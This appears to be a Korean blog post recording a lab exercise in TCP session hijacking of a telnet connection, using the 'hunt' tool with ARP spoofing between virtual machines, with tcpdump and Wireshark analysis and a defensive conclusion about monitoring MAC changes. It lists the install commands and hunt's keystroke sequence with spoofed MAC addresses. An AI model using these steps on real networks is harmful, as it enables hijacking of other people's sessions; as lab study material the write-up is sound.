- 구성과 계획
- 네트워크 구성도
- 과정 정리
- 관련내용정리
- 실습과정
- filtering : ip.addr == 192.168.10.150
- filtering : arp
- 결론
telnet
server att6 -
192.168.10.150/00:0C:29:16:97:9E
att6 -
192.168.10.149/00:0C:29:C6:9A:42
attack
att5 - 192.168.10.148/00:0C:29:5D:87:05
client winXP -
192.168.10.147/00:0c:29:26:42:b6
step1. att6 arpwatch,sendmail on
step2. client and
telnet server 통신 확인
step3. att5 hunt 설치
step4. att6 tcpdump on
step5. client -> telnet server 접속
step6. att hunt 실행
step7. wireshark 패킷 분석
hunt : TCP 세션 하이재킹을 위한 프로그램
TCP 세션 하이재킹 : 이미 시스템에 접속되어 세션이
연결되어 있는 상태를 가로채기 하는 공격
step1. att6 arpwatch,sendmail on
service arpwatch start
service sendmail restart
step2. client and
telnet server 통신 확인
ping 192.168.10.150
step3. att5 hunt 설치
yum install -y hunt
step4. att6 tcpdump on
tcpdump -i eth0 -xX -w sessionHijacking.cap
step5. client -> telnet server 접속
telnet 192.168.10.150
step6. att hunt 실행
hunt
d
a
s
a
192.168.10.147
11:11:11:11:11:11
192.168.10.150
22:22:22:22:22:22
1
y
x
x
l
a
0
r
y
s
step7. wireshark 패킷 분석
wireshark on
텔넷 로그인 패킷
arp 스푸핑을
하는 패킷
요즘 텔넷은 tcp 하이재킹이 어렵다. 시도하는순간 연결을 종료해버린다.
항상 맥주소가 임의로 해커에게 바뀌지않도록 감시해야한다.
댓글 없음:
댓글 쓰기